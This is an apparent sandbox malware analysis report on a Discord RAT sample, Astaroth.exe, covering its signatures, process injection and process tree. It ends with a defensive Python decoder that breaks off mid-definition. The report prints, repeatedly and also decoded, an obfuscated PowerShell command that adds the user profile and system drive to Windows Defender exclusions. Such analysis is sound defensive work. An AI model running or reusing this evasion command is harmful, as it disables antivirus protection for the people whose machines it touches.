Malware Analysis Report

2024-09-11 09:19

Sample ID 240616-cyldkazcpq
Target Astaroth.exe
SHA256 893092b2ad575827e3e4141319c95e950a8cf603a2327463c58589c98a2f199d
Tags
discordrat execution persistence rat rootkit stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

893092b2ad575827e3e4141319c95e950a8cf603a2327463c58589c98a2f199d

Threat Level: Known bad

The file Astaroth.exe was found to be: Known bad.

Malicious Activity Summary

discordrat execution persistence rat rootkit stealer

Discord RAT

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-16 02:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 02:29

Reported

2024-06-16 02:32

Platform

win11-20240611-en

Max time kernel

1s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

Signatures

Discord RAT

stealer rootkit rat persistence discordrat

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\system.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4992 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4992 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 4992 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 3584 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3584 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 3584 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\Astaroth.exe
PID 3712 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3712 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 3712 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\System32\Conhost.exe
PID 5016 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5016 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe
PID 5016 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\Astaroth.exe C:\Users\Admin\AppData\Local\Temp\system.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

The -EncodedCommand argument is base64 of UTF-16LE text. Decoded, it reads Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, padded with throwaway <# ... #> block comments between the tokens; that is, the sample adds the user profile and the entire system drive to the Windows Defender exclusion list before the dropped system.exe runs.

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

The report's process list repeats the three entries above (powershell.exe with the encoded command, system.exe, Astaroth.exe) a further 26 times with identical image paths and command lines. Note that the image path is the 32-bit SysWOW64 PowerShell host although the command line names the System32 path: that is the result of WOW64 file system redirection when a 32-bit parent launches powershell.exe by its System32 path.

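Decoded, the -EncodedCommand value in the powershell.exe entries above is base64 over UTF-16LE text and reads `<#nsz#>Add-MpPreference <#ynf#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#vte#> -Force <#cnu#>`. It adds Microsoft Defender exclusions for the entire user profile and the entire system drive, which leaves nothing of interest on the host subject to real-time scanning; the `<#...#>` block comments are junk tokens that change the encoded string without changing what runs. The script below is an added example, not part of the report or the sample: it takes the command line as a process-creation event would record it, decodes it, strips the comments and flags the exclusion. The set of "broad" exclusion targets and the severity labels are the example's own assumptions.

```python
"""Decode and triage the -EncodedCommand powershell.exe line from this report."""
import base64
import re
from typing import Optional

# powershell.exe command line copied from the report's process list; the
# -EncodedCommand value is the report's own data, not a constructed sample.
REPORT_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -EncodedCommand "'
    "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkA"
    "bgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoA"
    "VQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYA"
    'ZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="'
)

# Exclusion targets that switch Defender off for most of the host. Which
# targets count as "broad" is this example's assumption, not a Defender rule.
BROAD_EXCLUSIONS = {"$env:systemdrive", "$env:userprofile", "$env:systemroot", "$env:windir"}
DRIVE_ROOT = re.compile(r"^[a-z]:\\?$", re.IGNORECASE)


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 argument after -EncodedCommand. powershell.exe also
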